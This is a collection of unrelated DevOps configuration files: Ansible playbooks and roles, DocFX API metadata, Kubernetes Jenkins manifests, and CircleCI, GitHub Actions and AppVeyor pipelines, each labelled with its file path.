        - ntp
        - net-tools
        - bind-utils
        - tcpdump
        - pyOpenSSL
        - git
    # state=permissive keeps SELinux loaded but non-enforcing; it does not
    # fully disable it, so the task name reflects that.
    - name: set SELinux to permissive
      selinux: policy=targeted state=permissive
    - name: prepare configuration directories
      file:
        path: "{{ item }}"
        state: directory
      with_items:
        - /etc/dnsmasq
        - /etc/httpd
        - "{{ tftp_boot_loc }}"
        - "{{ tftp_boot_loc }}/centos_cloud_atomic_23/"
        - "{{ archives_loc }}"
        - /opt/ISOs
    - name: configure dnsmasq
      template:
        src: "{{ templates_dir }}/dnsmasq.conf.j2"
        dest: "/etc/dnsmasq/dnsmasq.conf"
        owner: root
        group: root
        # Quoted so YAML does not parse the octal mode as an integer.
        mode: "0644"
      notify: restart dnsmasq
    - name: configure ntp
      template:
        src: "{{ templates_dir }}/ntp.conf.j2"
        dest: "/etc/ntp.conf"
        owner: root
        group: root
        mode: "0644"
      notify: restart ntp
    - name: configure httpd
      copy:
        src: "{{ src_cfg_dir }}/etc/httpd/conf.d/local-kickstart.conf"
        dest: "/etc/httpd/conf.d/local-kickstart.conf"
        owner: root
        group: root
        mode: "0644"
      notify: restart httpd
    - name: configure httpd port 8080
      lineinfile:
        dest: "/etc/httpd/conf/httpd.conf"
        regexp: "Listen 8080"
        line: "Listen 8080"
      notify: restart httpd
    - name: enable and start services
      service: name={{ item }} enabled=yes state=started
      with_items:
        - dnsmasq
        - httpd
        - tftp
        - vsftpd
        - ntpd
    - name: bootloader files
      shell: ls /usr/share/syslinux
      register: bootloader_files
    #- name: What's in bootloader_files?
    #  debug: var=bootloader_files
    - name: add bootloader files
      shell: cp -r /usr/share/syslinux/* {{ tftp_boot_loc }}/.
    - name: is ISO in /vagrant/archives?
      stat: path={{ atomic_c_iso_loc }}
      register: atomic_iso_stat
    - name: What's in atomic_iso_stat?
      debug: var=atomic_iso_stat
    # NOTE(review): if re-enabled, the condition must be
    # `when: not atomic_iso_stat.stat.exists` — the previous commented-out
    # version referenced a non-existent `atomic_iso_stat.exists`.
    #- name: fail on missing ISO
    #  fail: msg="Add the atomic ISO to archives: wget {{ atomic_c_iso_url }}."
    #  when: not atomic_iso_stat.stat.exists
    - name: copy ISO to archives
      copy: src={{ atomic_c_iso_loc }} dest=/opt/ISOs
      when: atomic_iso_stat.stat.exists
    - name: download ISO
      get_url: >
        url={{ atomic_c_iso_url }}
        dest=/opt/ISOs
        timeout=600
      when: not atomic_iso_stat.stat.exists
    - name: mount ISOs
      mount:
        name: /var/ftp/pub/centos_cloud_atomic_23
        src: "/opt/ISOs/{{ atomic_c_iso }}"
        fstype: iso9660
        opts: loop,ro
        state: mounted
    - name: prepare tftp boot
      shell: cp -r /var/ftp/pub/centos_cloud_atomic_23/images/pxeboot/* {{ tftp_boot_loc }}/centos_cloud_atomic_23/.
playbooks/setup-kickstart.yml
|
# DocFX-style API reference metadata for the O365ConnectorCard interface of
# the botframework-schema package. Presumably generated by the docs pipeline
# (the file lives under docs-ref-autogen) — verify before hand-editing.
name: O365ConnectorCard
uid: botframework-schema.O365ConnectorCard
package: botframework-schema
summary: ''
fullName: O365ConnectorCard
remarks: ''
isPreview: false
isDeprecated: false
type: interface
properties:
  - name: potentialAction
    uid: botframework-schema.O365ConnectorCard.potentialAction
    package: botframework-schema
    summary: ''
    fullName: potentialAction
    remarks: ''
    isPreview: false
    isDeprecated: false
    syntax:
      content: 'potentialAction?: O365ConnectorCardActionBase[]'
      return:
        type: '<xref uid="botframework-schema.O365ConnectorCardActionBase" />[]'
        description: ''
  - name: sections
    uid: botframework-schema.O365ConnectorCard.sections
    package: botframework-schema
    summary: ''
    fullName: sections
    remarks: ''
    isPreview: false
    isDeprecated: false
    syntax:
      content: 'sections?: O365ConnectorCardSection[]'
      return:
        type: '<xref uid="botframework-schema.O365ConnectorCardSection" />[]'
        description: ''
  - name: summary
    uid: botframework-schema.O365ConnectorCard.summary
    package: botframework-schema
    summary: ''
    fullName: summary
    remarks: ''
    isPreview: false
    isDeprecated: false
    syntax:
      content: 'summary?: string'
      return:
        type: string
        description: ''
  - name: text
    uid: botframework-schema.O365ConnectorCard.text
    package: botframework-schema
    summary: ''
    fullName: text
    remarks: ''
    isPreview: false
    isDeprecated: false
    syntax:
      content: 'text?: string'
      return:
        type: string
        description: ''
  - name: themeColor
    uid: botframework-schema.O365ConnectorCard.themeColor
    package: botframework-schema
    summary: ''
    fullName: themeColor
    remarks: ''
    isPreview: false
    isDeprecated: false
    syntax:
      content: 'themeColor?: string'
      return:
        type: string
        description: ''
  - name: title
    uid: botframework-schema.O365ConnectorCard.title
    package: botframework-schema
    summary: ''
    fullName: title
    remarks: ''
    isPreview: false
    isDeprecated: false
    syntax:
      content: 'title?: string'
      return:
        type: string
        description: ''
|
botbuilder-typescript/docs-ref-autogen/botframework-schema/O365ConnectorCard.yml
|
# DocFX reference metadata (French-localized summaries) for the
# ContainerServiceNetworkProfile interface of @azure/arm-containerservice.
# Presumably generated output (docs-ref-autogen path) — verify before editing.
# Note: the "\_" sequences in double-quoted summaries are escaped non-breaking
# spaces and are part of the data.
items:
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile'
    name: ContainerServiceNetworkProfile
    fullName: ContainerServiceNetworkProfile
    children:
      - '@azure/arm-containerservice.ContainerServiceNetworkProfile.dnsServiceIP'
      - '@azure/arm-containerservice.ContainerServiceNetworkProfile.dockerBridgeCidr'
      - '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPlugin'
      - '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPolicy'
      - '@azure/arm-containerservice.ContainerServiceNetworkProfile.podCidr'
      - '@azure/arm-containerservice.ContainerServiceNetworkProfile.serviceCidr'
    langs:
      - typeScript
    type: interface
    summary: Profil de configuration réseau.
    package: '@azure/arm-containerservice'
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.dnsServiceIP'
    name: dnsServiceIP
    fullName: dnsServiceIP
    children: []
    langs:
      - typeScript
    type: property
    summary: 'Adresse IP affectée au service DNS Kubernetes. Il doit être dans la plage d’adresses de service Kubernetes spécifiée dans serviceCidr. Valeur par défaut : ''10.0.0.10''.'
    optional: true
    syntax:
      content: 'dnsServiceIP?: undefined | string'
      return:
        type:
          - undefined | string
    package: '@azure/arm-containerservice'
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.dockerBridgeCidr'
    name: dockerBridgeCidr
    fullName: dockerBridgeCidr
    children: []
    langs:
      - typeScript
    type: property
    summary: 'Une plage IP notation CIDR attribuée au réseau de pont Docker. Il ne doit pas chevaucher les plages de sous-réseau IP ou la plage d’adresses de service Kubernetes. Valeur par défaut : ''172.17.0.1/16''.'
    optional: true
    syntax:
      content: 'dockerBridgeCidr?: undefined | string'
      return:
        type:
          - undefined | string
    package: '@azure/arm-containerservice'
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPlugin'
    name: networkPlugin
    fullName: networkPlugin
    children: []
    langs:
      - typeScript
    type: property
    summary: "Plug-in de réseau utilisé pour la création du réseau de Kubernetes. Les valeurs possibles sont\_: «\_azure\_», «\_kubenet\_». Valeur par défaut\_: «\_kubenet\_»."
    optional: true
    syntax:
      content: 'networkPlugin?: NetworkPlugin'
      return:
        type:
          - '@azure/arm-containerservice.NetworkPlugin'
    package: '@azure/arm-containerservice'
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPolicy'
    name: networkPolicy
    fullName: networkPolicy
    children: []
    langs:
      - typeScript
    type: property
    summary: "Stratégie de réseau utilisée pour la création du réseau de Kubernetes. Les valeurs possibles sont\_: «\_tricolore\_», «\_azure\_»"
    optional: true
    syntax:
      content: 'networkPolicy?: NetworkPolicy'
      return:
        type:
          - '@azure/arm-containerservice.NetworkPolicy'
    package: '@azure/arm-containerservice'
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.podCidr'
    name: podCidr
    fullName: podCidr
    children: []
    langs:
      - typeScript
    type: property
    summary: 'Plage d’adresse IP de notation CIDR à partir de laquelle attribuer les adresses IP de pod lorsque Kubernetes est utilisé. Valeur par défaut : ''10.244.0.0/16''.'
    optional: true
    syntax:
      content: 'podCidr?: undefined | string'
      return:
        type:
          - undefined | string
    package: '@azure/arm-containerservice'
  - uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.serviceCidr'
    name: serviceCidr
    fullName: serviceCidr
    children: []
    langs:
      - typeScript
    type: property
    summary: 'Plage d’adresses IP de notation CIDR à partir de laquelle attribuer des adresses IP de cluster de service. Elle ne doit empiéter sur aucune plage d’adresses IP de sous-réseau. Valeur par défaut : ''10.0.0.0/16''.'
    optional: true
    syntax:
      content: 'serviceCidr?: undefined | string'
      return:
        type:
          - undefined | string
    package: '@azure/arm-containerservice'
references:
  - uid: '@azure/arm-containerservice.NetworkPlugin'
    name: NetworkPlugin
    spec.typeScript:
      - name: NetworkPlugin
        fullName: NetworkPlugin
        uid: '@azure/arm-containerservice.NetworkPlugin'
  - uid: '@azure/arm-containerservice.NetworkPolicy'
    name: NetworkPolicy
    spec.typeScript:
      - name: NetworkPolicy
        fullName: NetworkPolicy
        uid: '@azure/arm-containerservice.NetworkPolicy'
|
docs-ref-autogen/@azure/arm-containerservice/ContainerServiceNetworkProfile.yml
|
# Jenkins on Kubernetes: local PV/PVC for JENKINS_HOME, RBAC for the
# Kubernetes plugin (pods/exec etc.), the Deployment, a Service and a
# Traefik IngressRoute.
apiVersion: v1
kind: PersistentVolume
metadata:
  name: jenkins-pv
spec:
  storageClassName: local # Local PV
  capacity:
    storage: 2Gi
  volumeMode: Filesystem
  accessModes:
  - ReadWriteOnce
  local:
    path: /var/lib/k8s/jenkins
  # local volumes must pin the node that owns the host path
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - ghost.com
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: jenkins-pvc
  namespace: kube-ops
spec:
  storageClassName: local
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 2Gi
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jenkins
  namespace: kube-ops
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: jenkins
rules:
  - apiGroups: ["extensions", "apps"]
    resources: ["deployments", "ingresses"]
    verbs: ["create", "delete", "get", "list", "watch", "patch", "update"]
  - apiGroups: [""]
    resources: ["services"]
    verbs: ["create", "delete", "get", "list", "watch", "patch", "update"]
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["create", "delete", "get", "list", "patch", "update", "watch"]
  - apiGroups: [""]
    resources: ["pods/exec"]
    verbs: ["create", "delete", "get", "list", "patch", "update", "watch"]
  - apiGroups: [""]
    resources: ["pods/log", "events"]
    verbs: ["get", "list", "watch"]
  - apiGroups: [""]
    resources: ["secrets"]
    verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  # ClusterRoleBinding is cluster-scoped; a metadata.namespace here would be
  # ignored, so it is intentionally omitted.
  name: jenkins
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: jenkins
subjects:
  - kind: ServiceAccount
    name: jenkins
    namespace: kube-ops
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: jenkins
  namespace: kube-ops
spec:
  selector:
    matchLabels:
      app: jenkins
  template:
    metadata:
      labels:
        app: jenkins
    spec:
      # serviceAccountName replaces the deprecated serviceAccount alias
      serviceAccountName: jenkins
      initContainers:
      # the official image runs as uid 1000; chown the host-backed volume
      - name: fix-permissions
        image: busybox
        command: ["sh", "-c", "chown -R 1000:1000 /var/jenkins_home"]
        securityContext:
          privileged: true
        volumeMounts:
        - name: jenkinshome
          mountPath: /var/jenkins_home
      containers:
      - name: jenkins
        image: jenkins/jenkins:lts
        imagePullPolicy: IfNotPresent
        env:
        - name: JAVA_OPTS
          value: -Dhudson.model.DownloadService.noSignatureCheck=true
        ports:
        - containerPort: 8080
          name: web
          protocol: TCP
        - containerPort: 50000
          name: agent
          protocol: TCP
        resources:
          limits:
            cpu: 1500m
            memory: 2048Mi
          requests:
            cpu: 1500m
            memory: 2048Mi
        readinessProbe:
          httpGet:
            path: /login
            port: 8080
          initialDelaySeconds: 60
          timeoutSeconds: 5
          failureThreshold: 12
        volumeMounts:
        - name: jenkinshome
          mountPath: /var/jenkins_home
      volumes:
      - name: jenkinshome
        persistentVolumeClaim:
          claimName: jenkins-pvc
---
apiVersion: v1
kind: Service
metadata:
  name: jenkins
  namespace: kube-ops
  labels:
    app: jenkins
spec:
  selector:
    app: jenkins
  ports:
  - name: web
    port: 8080
    targetPort: web
  - name: agent
    port: 50000
    targetPort: agent
# ---
# apiVersion: extensions/v1beta1
# kind: Ingress
# metadata:
#   name: jenkins
#   namespace: kube-ops
# spec:
#   rules:
#   - host: jenkins.k8s.local
#     http:
#       paths:
#       - backend:
#           serviceName: jenkins
#           servicePort: web
---
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
  name: jenkins
  namespace: kube-ops
spec:
  entryPoints:
    - web
  routes:
  - kind: Rule
    match: Host(`jenkins.k8s.local`)
    services:
    - name: jenkins
      port: 8080
|
jenkins.yaml
|
---
# tasks file for ajeleznov.oracle-jdk ansible role
# The Oracle JDK rpm file will be downloaded from repository and installed in the default location under /usr/java
- name: "Debug output for role parameters"
  tags: "oracle-jdk"
  debug:
    msg: "Running with delete_other_installations={{ delete_other_installations }}, old package name={{ java_version }}, new package name={{ package_newname }}"
    verbosity: 1
- name: "Check if java_version has a valid value"
  tags: "oracle-jdk"
  fail:
    msg: "java_version = {{ java_version }} is not a valid value"
  with_items: "{{ java_versions }}"
  when: java_version not in java_versions
- name: "Delete other Oracle JDK packages with name jdk1.X.0_X"
  tags: "remove-oracle-jdk"
  yum:
    name: "{{ item }}"
    state: absent
  with_items:
    # NOTE(review): difference() expects a list; if java_version is a plain
    # string this compares against its characters — confirm the variable types.
    - "{{ java_versions | difference(java_version) }}"
  when: delete_other_installations
  become: true
- name: "Delete other Oracle JDK packages with name jdk1.X"
  tags: "remove-oracle-jdk"
  yum:
    name: "{{ item }}"
    state: absent
  with_items:
    - "{{ package_newname }}"
  when: delete_other_installations and
        java_version not in new_packages
  become: true
- name: "Check for installed Oracle JDK with name {{ java_version }}"
  tags: "oracle-jdk"
  yum:
    list: "{{ java_version }}"
  register: package_status
- name: "Output the results if {{ java_version }} is installed"
  tags: "oracle-jdk"
  debug:
    msg: "A package {{ java_version }} is already installed."
    verbosity: 1
  when: package_status.results[0] is defined
- name: "Check for installed Oracle JDK with name jdk1.X"
  tags: "oracle-jdk"
  yum:
    list: "{{ package_newname }}"
  register: package_newname_status
- name: "Output the results if {{ package_newname }} is installed"
  tags: "oracle-jdk"
  debug:
    msg: "A package {{ package_newname }} is already installed with a version {{ package_newname_status.results[0].version }}."
    verbosity: 1
  when: package_newname_status.results[0] is defined
- name: "Set a version for a package jdk1.X"
  tags: "oracle-jdk"
  set_fact:
    installed_version: "jdk{{ package_newname_status.results[0].version }}"
  when: package_newname_status.results[0] is defined
- name: "Set a version for a package jdk1.X if first attempt not succeeded"
  # tagged like its siblings so installed_version is still set when the role
  # is run with --tags oracle-jdk (the later when: conditions depend on it)
  tags: "oracle-jdk"
  set_fact:
    installed_version: "N/A"
  when: package_newname_status.results[0] is not defined and
        java_version in new_packages
# the other versions have been deinstalled
- name: "Download Oracle JDK rpm file"
  tags: "oracle-jdk"
  get_url:
    url: "{{ jdk_download_url }}/{{ jdk_rpm_file }}"
    dest: "{{ workspace }}"
  when: ( java_version in new_packages and java_version != installed_version ) or
        ( java_version not in new_packages and package_status.results|length == 0 )
- name: "Install Oracle JDK rpm file"
  tags: "oracle-jdk"
  yum:
    name: "{{workspace}}/{{jdk_rpm_file}}"
    state: installed
    allow_downgrade: "{{ allow_downgrade }}"
  when: ( java_version in new_packages and java_version != installed_version ) or
        ( java_version not in new_packages and package_status.results|length == 0 )
  become: true
- name: "Delete downloaded file"
  tags: "oracle-jdk"
  file:
    path: "{{workspace}}/{{jdk_rpm_file}}"
    state: absent
  when: ( java_version in new_packages and java_version != installed_version ) or
        ( java_version not in new_packages and package_status.results|length == 0 )
- name: "Test java command"
  tags: "oracle-jdk"
  command: "/usr/java/default/bin/java -version"
  register: jdk_output
- name: "Output the results"
  tags: "oracle-jdk"
  debug:
    var: jdk_output.stderr
    verbosity: 1
|
tasks/main.yml
|
version: 2
jobs:
  build_front:
    machine:
      enabled: true
    steps:
      - run: npm install
      # - run: npm run deploy
  api_test:
    parallelism: 3
    docker:
      - image: circleci/ruby:2.3.5-node-browsers
        environment:
          BUNDLE_JOBS: 3
          BUNDLE_RETRY: 3
          BUNDLE_PATH: vendor/bundle
          PGHOST: 127.0.0.1
          RAILS_ENV: test
      - image: circleci/postgres:9.5-alpine
    steps:
      - checkout
      - run: bundle install --path vendor/bundle
      - run: bundle exec rake db:create db:schema:load db:migrate
      - run:
          name: Run request specs
          command: bundle exec rspec spec/requests
      - run:
          name: Run model specs
          command: bundle exec rspec spec/models
  deploy_staging:
    machine:
      enabled: true
    steps:
      - checkout
      - run:
          name: Deploy to Heroku
          # token-authenticated HTTPS push; pushes the staging branch
          command: |
            git push https://heroku:$HEROKU_API_KEY@git.heroku.com/$HEROKU_APP_NAME.git staging
      - run:
          name: Migrate DB
          command: |
            heroku run rake db:migrate --app $HEROKU_APP_NAME
      - run:
          name: Restart the app
          command: |
            heroku restart --app $HEROKU_APP_NAME
  deploy_master:
    machine:
      enabled: true
    steps:
      - checkout
      - run:
          name: Deploy to Heroku
          command: |
            git push https://heroku:$HEROKU_API_KEY@git.heroku.com/$HEROKU_APP_NAME.git
      - run:
          name: Migrate DB
          command: |
            heroku run rake db:migrate --app $HEROKU_APP_NAME
      - run:
          name: Restart the app
          command: |
            heroku restart --app $HEROKU_APP_NAME
workflows:
  version: 2
  build-and-deploy:
    jobs:
      - api_test
      - build_front
      - deploy_staging:
          requires:
            - api_test
          filters:
            branches:
              only: staging
      - deploy_master:
          requires:
            - api_test
          filters:
            branches:
              only: master
|
.circleci/config.yml
|
---
# Ansible tasks: install the Percona monitoring plugins for Cacti.
# Flow: apt dependencies -> git checkout -> (on checkout change) patch the
# template generator, build and import the Cacti templates, rsync the ss_*
# scripts into place, clean the working tree -> render the php config files.
- name: install dependencies
  apt:
    name: "{{ cacti_plugin_percona_dependencies }}"
    state: "{{ apt_install_state | default('latest') }}"
    update_cache: true
    cache_valid_time: "{{ apt_update_cache_valid_time | default(3600) }}"
  tags:
    - configuration
    - cacti-plugin-percona
    - cacti-plugin-percona-dependencies
- name: create directories
  file:
    path: "{{ item }}"
    state: directory
    owner: root
    group: root
    mode: 0755
  with_items:
    - "{{ cacti_plugin_percona_checkout_path | dirname }}"
    - "{{ cacti_plugin_percona_config_path }}"
  tags:
    - configuration
    - cacti-plugin-percona
    - cacti-plugin-percona-directories
    - cacti-plugin-percona-directories-create
- name: checkout repository
  git:
    repo: "{{ cacti_plugin_percona_git_repo }}"
    dest: "{{ cacti_plugin_percona_checkout_path }}"
    version: "{{ cacti_plugin_percona_git_version }}"
    force: true
  # _git_checkout gates the build/import block below
  register: _git_checkout
  tags:
    - configuration
    - cacti-plugin-percona
    - cacti-plugin-percona-checkout
- block:
    # pin $SVN_REV so the generated templates are reproducible
    - name: patch pmp-cacti-template
      lineinfile:
        path: "{{ cacti_plugin_percona_checkout_path }}/cacti/bin/pmp-cacti-template"
        regexp: '^our\ \$SVN_REV\ \=\ .*\;$'
        line: 'our $SVN_REV = 42;'
      tags:
        - cacti-plugin-percona-templates
        - cacti-plugin-percona-templates-patch
        - cacti-plugin-percona-templates-patch-pmp-cacti-template
    # stop make.sh before it reaches the (unwanted) Zabbix generation step
    - name: patch make.sh
      lineinfile:
        path: "{{ cacti_plugin_percona_checkout_path }}/make.sh"
        line: 'exit;'
        insertbefore: '^\#\ Generate\ Zabbix'
      tags:
        - cacti-plugin-percona-templates
        - cacti-plugin-percona-templates-patch
        - cacti-plugin-percona-templates-patch-make-sh
    - name: make templates
      command: >
        ./make.sh
      args:
        chdir: "{{ cacti_plugin_percona_checkout_path }}"
      tags:
        - cacti-plugin-percona-templates
        - cacti-plugin-percona-templates-make
    # feed every generated *.xml template to Cacti's import_template.php
    - name: import templates
      shell: >
        true \
        && test -f {{ cacti_plugin_percona_import_template_php_path }} \
        && find {{ cacti_plugin_percona_release_path }}/templates \
        -name '*.xml' \
        -print0 | \
        xargs -0 --no-run-if-empty -L1 -i'{}' \
        php {{ cacti_plugin_percona_import_template_php_path }} --filename='{}' {{ cacti_plugin_percona_import_template_php_options | join(' ') }}
      args:
        chdir: "{{ cacti_plugin_percona_checkout_path }}"
        warn: false
      tags:
        - cacti-plugin-percona-templates
        - cacti-plugin-percona-templates-import
    # rsync -i prints one line per change; used below for changed_when
    - name: install scripts
      shell: >
        true \
        && test -d {{ cacti_plugin_percona_release_path }}/scripts/ \
        && test -d {{ cacti_plugin_percona_scripts_path }}/ \
        && rsync \
        -ai --checksum --delete \
        --chown=root:root \
        {{ cacti_plugin_percona_release_path }}/scripts/ss_* \
        {{ cacti_plugin_percona_scripts_path }}/
      args:
        warn: false
      register: _scripts_copy
      changed_when: _scripts_copy.stdout_lines | length > 0
      tags:
        - cacti-plugin-percona-scripts
        - cacti-plugin-percona-scripts-install
    # drop the local patches/build artifacts so the next checkout is clean
    - name: cleanup
      shell: >
        git reset --hard && git clean -d -x -f
      args:
        chdir: "{{ cacti_plugin_percona_checkout_path }}"
      tags:
        - cacti-plugin-percona-cleanup
        - cacti-plugin-percona-cleanup-build
  when: _git_checkout is changed
  tags:
    - configuration
    - cacti-plugin-percona
- name: update configuration files
  template:
    # template name mirrors the destination path with the leading / stripped
    src: "{{ item.lstrip('/') }}.j2"
    dest: "{{ item }}"
    owner: "{{ cacti_plugin_percona_ss_get_x_php_cnf_user }}"
    group: "{{ cacti_plugin_percona_ss_get_x_php_cnf_group }}"
    mode: "{{ cacti_plugin_percona_ss_get_x_php_cnf_mode }}"
  with_items:
    - "{{ cacti_plugin_percona_ss_get_by_ssh_php_cnf_file }}"
    - "{{ cacti_plugin_percona_ss_get_mysql_stats_php_cnf_file }}"
  tags:
    - configuration
    - cacti-plugin-percona
    - cacti-plugin-percona-scripts
    - cacti-plugin-percona-scripts-configure
|
tasks/main.yml
|
name: Javascript Lint
on: pull_request
jobs:
  # Detect which service directories changed; the output is a JSON array of
  # filter names consumed as the matrix of the lint/tests jobs below.
  changes:
    runs-on: ubuntu-latest
    outputs:
      services: ${{ steps.filter.outputs.changes }}
    steps:
      - uses: dorny/paths-filter@v2
        id: filter
        with:
          token: ${{ github.token }}
          filters: |
            gateway:
              - "gateway/**"
            frontend:
              - "frontend/**"
            association-frontend:
              - "association-frontend/**"
  # One lint run per changed service; skipped entirely when nothing matched.
  lint:
    runs-on: ubuntu-latest
    needs: [changes]
    if: ${{ needs.changes.outputs.services != '[]' && needs.changes.outputs.services != '' }}
    strategy:
      fail-fast: false
      matrix:
        service: ${{ fromJSON(needs.changes.outputs.services) }}
    defaults:
      run:
        working-directory: ./${{ matrix.service }}
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-node@v2
        with:
          node-version: '14'
      - name: Cache dependencies
        uses: actions/cache@v1
        id: cache
        with:
          path: ./node_modules
          key: node_modules-${{ matrix.service }}-${{ hashFiles('yarn.lock') }}-v3
      - name: Install dependencies
        run: yarn install
      # the frontends need generated code before linting/type-checking
      - name: Codegen
        if: ${{ matrix.service == 'frontend' || matrix.service == 'association-frontend' }}
        run: yarn run codegen
      - name: Lint
        run: yarn run lint
      - name: TS Lint
        run: yarn run lint:ts
      - name: Prettier
        run: yarn run lint:prettier
  # Same setup as lint (Actions YAML has no anchor support, hence the
  # duplication), but running the unit tests instead.
  tests:
    runs-on: ubuntu-latest
    needs: [changes]
    if: ${{ needs.changes.outputs.services != '[]' && needs.changes.outputs.services != '' }}
    strategy:
      fail-fast: false
      matrix:
        service: ${{ fromJSON(needs.changes.outputs.services) }}
    defaults:
      run:
        working-directory: ./${{ matrix.service }}
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-node@v2
        with:
          node-version: '14'
      - name: Cache dependencies
        uses: actions/cache@v1
        id: cache
        with:
          path: ./node_modules
          key: node_modules-${{ matrix.service }}-${{ hashFiles('yarn.lock') }}-v3
      - name: Install dependencies
        run: yarn install
      - name: Codegen
        if: ${{ matrix.service == 'frontend' || matrix.service == 'association-frontend' }}
        run: yarn run codegen
      - name: Unit tests
        run: yarn run test
|
.github/workflows/javascript-lint.yml
|
# AppVeyor pipeline: build devopsdays-cli for 386/amd64, package as MSI and
# chocolatey nupkg, publish to a GitHub release and to bintray.
image: Visual Studio 2017
clone_folder: c:\gopath\src\github.com\devopsdays\devopsdays-cli
# set to false to build on any commit.
skip_non_tags: true
environment:
  # improve readability
  VCS_URL: https://github.com/%APPVEYOR_REPO_NAME%
  GH_USER: "%APPVEYOR_ACCOUNT_NAME%"
  VERSION: "%APPVEYOR_REPO_TAG_NAME%"
  # specific to go
  GOPATH: c:\gopath
  # specific to bintray
  JFROG_CLI_OFFER_CONFIG: false
  # define secure tokens
  CHOCOKEY:
    secure: "%CHOCOKEY%"
  BT_KEY:
    secure: <KEY>
  GH_TOKEN:
    secure: <KEY>
# prepare system and project
install:
  # install required software
  - choco source add -n=mh-cbon -s="https://api.bintray.com/nuget/mh-cbon/choco"
  - choco install changelog gh-api-cli go-msi -y
  - refreshenv
  # to test the build on non tag commits.
  - if "%x%"=="%VERSION%" set VERSION=1.0.2
  # ensure wix is available in PATH
  - set PATH=%WIX%\bin;%PATH%
  # fetch bintray client
  - curl -fsSk -o jfrog.exe -L "https://api.bintray.com/content/jfrog/jfrog-cli-go/$latest/jfrog-cli-windows-amd64/jfrog.exe?bt_package=jfrog-cli-windows-amd64"
  # specific to go
  - set PATH=%GOPATH%\bin;%PATH%
  - go get -u github.com/mh-cbon/never-fail
  - go get -u github.com/Masterminds/glide
  - go get -u github.com/aktau/github-release
# test_script:
# # - go test ./...
# - go run main.go
# build msi artifacts
build_script:
  # build the program for x386 arch
  - go get ./...
  - set GOARCH=386
  - go build -o %APPVEYOR_PROJECT_NAME%.exe --ldflags "-X cmd.Version=%VERSION%" main.go
  # generate the x386 MSI package
  - go-msi make --msi %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi --version %VERSION% --arch %GOARCH%
  # build a cross platform x386 nuget package.
  # (fixed: removed a duplicated --version flag and a stray trailing quote)
  - go-msi choco --path wix.json --input %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi --version %VERSION%
  # build the program for amd64 arch
  - set GOARCH=amd64
  - go build -o %APPVEYOR_PROJECT_NAME%.exe --ldflags "-X cmd.Version=%VERSION%" main.go
  # generate the amd64 MSI package
  - go-msi make --msi %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi --version %VERSION% --arch %GOARCH%
  - pwd
  - dir
# configure the artifacts to upload to the github release page
artifacts:
  - path: 'devopsdays-cli-386-*.msi'
    name: msi-x86
  - path: 'devopsdays-cli-amd64-*.msi'
    name: msi-x64
# setup the github release page upload
deploy:
  provider: GitHub
  release: devopsdays-cli-v$(VERSION)
  tag: $(appveyor_repo_tag_name)
  artifact: msi-x86, msi-x64
  force_update: true
  draft: false
  prerelease: true
  auth_token:
    secure: <KEY>PRpfP
  on:
    appveyor_repo_tag: true
# deploy the nuget/msi packages to bintray
after_build:
  - set GOARCH=386
  # - github-release info -s "%GH_TOKEN" -u devopsdays -r devopsdays-cli -t "0.7.36"
  # - github-release upload -s "%GH_TOKEN" -u "devopsdays" -r "devopsdays-cli" -t "0.7.36" -f "%APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi" -n "%APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi"
  # setup both "choco" and "msi" repositories on bintray
  # - never-fail jfrog bt pc --user mattstratton --key %BT_KEY% --licenses=MIT --vcs-url=https://github.com/%APPVEYOR_REPO_NAME%/ devopsdays/msi/%APPVEYOR_PROJECT_NAME%
  # - never-fail jfrog bt pc --user mattstratton --key %BT_KEY% --licenses=MIT --vcs-url=https://github.com/%APPVEYOR_REPO_NAME%/ devopsdays/choco/%APPVEYOR_PROJECT_NAME%
  # upload the nupkg
  - jfrog bt upload --user mattstratton --key %BT_KEY% --override=true --publish=true %APPVEYOR_PROJECT_NAME%.%VERSION%.nupkg devopsdays/choco/%APPVEYOR_PROJECT_NAME%/%VERSION%
  # upload the x386 msi artifact
  - set GOARCH=386
  - jfrog bt upload --user mattstratton --key %BT_KEY% --override=true --publish=true %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi devopsdays/msi/%APPVEYOR_PROJECT_NAME%/%VERSION%
  # upload the amd64 msi artifact
  - set GOARCH=amd64
  - jfrog bt upload --user mattstratton --key %BT_KEY% --override=true --publish=true %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi devopsdays/msi/%APPVEYOR_PROJECT_NAME%/%VERSION%
|
appveyor.yml
|
Skip to content
Search or jump to…
Pull requests
Issues
Marketplace
Explore
@ossdev07
0
091ossdev07/constructor
forked from conda/constructor
Code Pull requests 0 Actions Projects 0 Wiki Security Insights Settings
constructor/.travis.yml
@msarahan msarahan remove support for conda less than 4.6
44d73bd on Aug 9, 2019
@msarahan@ne<EMAIL> <PASSWORD>@<EMAIL>
82 lines (70 sloc) 2.06 KB
# https://travis-ci.org/conda/constructor
language: python
sudo: false
branches:
  only:
    - master
env:
  global:
